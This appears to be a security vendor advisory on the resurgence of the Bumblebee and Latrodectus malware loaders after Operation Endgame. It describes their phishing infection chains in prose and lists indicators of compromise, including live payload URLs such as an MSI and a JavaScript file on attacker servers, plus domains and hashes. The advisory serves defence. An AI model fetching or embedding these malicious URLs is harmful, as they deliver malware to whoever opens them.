July 1, 2025
Proactive Defense: The Importance of Incident Response Planning in Cybersecurity
ICS: Multiple Schneider Electric Data Center Expert Vulnerabilities
October 23, 2024Multiple Google Chrome Vulnerabilities
October 23, 2024ICS: Multiple Schneider Electric Data Center Expert Vulnerabilities
October 23, 2024Multiple Google Chrome Vulnerabilities
October 23, 2024
Severity
High
Analysis Summary
As part of fresh phishing attempts, two malware families that experienced setbacks following a concerted law enforcement operation known as Endgame have reappeared. Both malware loaders, Bumblebee and Latrodectus, are made to steal personal information in addition to downloading and running other payloads on compromised systems.
Due to infrastructure parallels between the two malware families, Latrodectus—also known as BlackWidow, IceNova, Lotus, or Unidentified 111—is regarded as IcedID's successor. Campaigns including the initial access brokers (IABs) TA577 (also known as Water Curupira) and TA578 have made use of it. A group of European nations took down more than 100 servers connected to several malware outbreaks, including IcedID (and consequently Latrodectus), SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot, in May 2024.
Despite not being specifically mentioned in the operation, Latrodectus was also impacted, and its infrastructure went down. In a report released earlier this month, researchers characterized Latrodectus as a unique threat that has gained momentum since Operation Endgame. Latrodectus was affected at first but recovered fast. Its sophisticated abilities made it a dangerous threat by filling the gap left by its handicapped predecessors.
To trigger the malware deployment process, attack chains usually use malspam campaigns, taking advantage of hacked email threads and posing as trustworthy organizations like Google Cloud and Microsoft Azure. The DocuSign-themed email messages in the recently discovered infection sequence by cybersecurity researchers follow the same path, containing either HTML files with embedded JavaScript code or PDF attachments with a malicious link that are designed to download a PowerShell script or an MSI installer, respectively.
Whichever technique is used, the attack ends with the deployment of a malicious DLL file, which causes the Latrodectus malware to be launched. Latrodectus distributes malware payloads to the commercial, automobile, and financial sectors by utilizing both new and old infrastructure. The Bumblebee loader, which uses a ZIP archive file that was probably received through phishing emails, coincides with the ongoing Latrodectus operations.
Instead of writing the DLL to disk, the ZIP file includes an LNK file called "Report-41952.lnk" that, when run, initiates a series of actions to download and run the last Bumblebee payload in memory. The purpose of the LNK file is to run a PowerShell command that will download an MSI installer from a distant server. The MSI samples, which pose as NVIDIA and Midjourney installers, act as a route to start the Bumblebee DLL after they are launched.
To avoid creating additional processes and writing the final payload to disk, Bumblebee employs a more covert strategy. It accomplishes this by forcing the DllRegisterServer export function included in a file in the File table to run using the SelfReg table. In this case, it was the final payload DLL, and the item in the SelfReg table served as a key to specify which file in the File table should be executed.
Impact
- Sensitive Data Theft
- Unauthorized Access
- Financial Loss
- Identity Theft
Indicators of Compromise
Domain Name
- tiguanin.com
- greshunka.com
- bazarunet.com
- mazinom.com
- leroboy.com
- krinzhodom.com
- klemanzino.net
- rilomenifis.com
- isomicrotich.com
IP
- 194.54.156.91
MD5
- 9fbff5e231c2cad8612ad112e1bb78ea
- 528eb8826dffaea4080fbc60d6295016
- 3cb6b99b20930ac0dbadc10899dc511e
- bc8e744b7004cf5f0d36aba128abb175
- b9a2848089e8e6e46acfd3578fc57de0
SHA-256
- 3b86c9516bd5d57758ab976e32af2d7873d7ad0b0e063a49ee13c168f2c1e980
- 0a42503e19d36070db3b03249cad33c73ee941b7af32170f25234ac5f3a30823
- ea1792f689bfe5ad3597c7f877b66f9fcf80d732e5233293d52d374d50cab991
- 617e31e9f71b365fe69719d3fc980d763e827a4f93d0e776d1587d0bfdb47674
- 6ab1bee44804b0821933c7b20bbdc92deb6a21fd587a51d43761ba1500c2149d
SHA-1
- 9361621490915ebb919b79c6101874f03e4e51bc
- 71e99a21ffa29e1e391811f5a3d04dcbb9cf0949
- 570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
- 62e23500cc5368e37be47371342784f72e481647
- 7474873629399ee5fdd984c99b705e0490ab8707
URL
- https://delview.com/MobileDefault.aspx?reff=https://cutt.ly/seU8MT6t
- https://cutt.ly/seU8MT6t
- https://digitalpinnaclepub.com/?3
- https://storage.googleapis.com/braided-turbine-435813-n7.appspot.com/VA8PBxartt/Document-20-17-57.js
- http://194.54.156.91/dsa.msi
- http://gertioma.top/o.jpg
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
- Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
- Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
- Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
- Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
- Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
- Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
- Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.